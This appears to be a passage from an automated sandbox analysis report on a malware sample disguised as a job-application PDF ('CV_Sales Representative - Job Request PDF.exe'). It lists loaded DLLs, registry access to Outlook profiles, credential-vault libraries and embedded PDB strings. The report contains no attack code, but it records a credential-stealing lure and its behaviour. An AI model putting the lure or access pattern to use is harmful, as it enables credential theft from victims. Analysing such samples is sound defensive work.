            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
            Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfcore.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfplat.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ksuser.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mfperfhelper.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: rtworkq.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
            Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
            Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
            Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
            Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
            Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
            Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
            Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
            Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
            Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
            Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
            Source: C:\Windows\SysWOW64\mfpmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CV_Sales Representative - Job Request PDF.exeStatic file information: File size 1787392 > 1048576
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1163189385.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.1595997074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1240058581.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdbUGP source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
            Source: Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
            Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
            Source: Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737896390.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7EFPjTEjLAB4.exe, 00000017.00000000.1273207364.000000000071F000.00000002.00000001.01000000.00000007.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2410736360.000000000071F000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1721195083.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
            Source: Binary string: ALG.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
